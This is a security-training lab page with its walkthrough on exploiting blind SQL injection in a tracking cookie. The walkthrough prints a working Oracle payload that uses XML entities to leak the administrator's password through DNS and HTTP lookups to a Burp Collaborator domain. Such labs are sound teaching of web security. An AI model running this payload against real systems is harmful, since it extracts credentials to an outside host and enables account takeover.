Lab: Blind SQL injection with out-of-band data exfiltration

PRACTITIONER

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The SQL query is executed asynchronously and has no effect on the application's response. However, you can trigger out-of-band interactions with an external domain.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Note

You must use the public Burp Collaborator server (burpcollaborator.net).

SQL injection cheat sheet

Access the lab

Solution

Visit the front page of the shop, and use Burp Suite Professional to intercept and modify the request containing the TrackingId cookie.
Go to the Burp menu, and launch the Burp Collaborator client.
Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.
Modify the TrackingId cookie, changing it to something like the following, but insert your Burp Collaborator subdomain where indicated: TrackingId=x'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--.
Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again, since the server-side query is executed asynchronously.
You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The password of the administrator user should appear in the subdomain of the interaction, and you can view this within the Burp Collaborator client. For DNS interactions, the full domain name that was looked up is shown in the Description tab. For HTTP interactions, the full domain name is shown in the Host header in the Request to Collaborator tab.
Go to the "Account login" function of the lab, and use the password to log in as the administrator user.

Want to track your progress and have a more personalized learning experience? (It's free!)

In this topic

SQL injection UNION attacks Examining the database Blind SQL injection SQL injection cheat sheet

All topics

SQL injection XSS CSRF Clickjacking DOM-based CORS XXE SSRF Request smuggling Command injection Server-side template injection Insecure deserialization Directory traversal Access control Authentication Business logic vulnerabilities Web cache poisoning WebSockets Information disclosure

Lab: Blind SQL injection with out-of-band data exfiltration

Note

Read more

Solution

In this topic

All topics

Find SQL injection vulnerabilities using Burp Suite